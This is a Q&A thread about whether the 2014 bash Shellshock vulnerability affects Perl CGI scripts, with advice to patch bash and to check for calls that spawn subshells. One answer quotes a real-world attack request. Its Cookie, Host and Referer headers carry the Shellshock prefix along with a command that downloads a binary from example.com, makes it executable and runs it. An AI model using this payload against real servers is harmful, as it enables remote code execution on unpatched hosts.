# The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

Tags: bash, security, shellshock-bash-bug

Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability.
I am trying to understand if it can affect my server via my Perl CGI scripts.

Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?

Comment: [Vulnerability summary in the National Cyber Awareness System](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271)

Answer (score 5, accepted):

Yes it affects Perl if your CGI script spawns subshells, e.g., using the `system()` or `open()` functions or backticks. See [this excellent Red Hat blog post](https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/). Note that the blog post is not Red Hat specific in any significant way.

Check your Perl CGI scripts for these functions, **BUT FIRST UPGRADE BASH TO A FIXED VERSION!**

Comment: ...well, that's the case _if_ your `/bin/sh` is bash. If the host is Debian or Ubuntu, where `/bin/sh` is dash, then `system()` is safe.

Comment: @CharlesDuffy , You are correct that `system()` uses `/bin/sh` and if that doesn't point to bash, then a bash bug doesn't affect it. However, my main point was to prioritize updating bash over trying to figure out whether a program is vulnerable.

Comment: Actually, given the recent developments, it may be a good idea to use something else than bash for `/bin/sh` at least until things settle down. Good call @CharlesDuffy.

Answer (score 0):

You could try to set special crafted strings to the HTTP server als Referrer, Cookie, Host or Accept header which are then passed to (bash) CGI scripts:

> GET./.HTTP/1.0 .User-Agent:.Thanks-Rob
>   .Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
>   .Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
>   .Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
>   .Accept:.*/*

See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.

If your Perl scripts do not call `bash` (by using `system` or `open`) you should be safe.

See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Comment: but does the CGI script must then do something with that headers to be afffected? what are conditions? what do the CGI perl script must do to have problems?

Comment: I extended the answer. If you use bash, nothing has to be done with the headers; as the webserver passes them to the bash script they get "active" if bash is not already patched.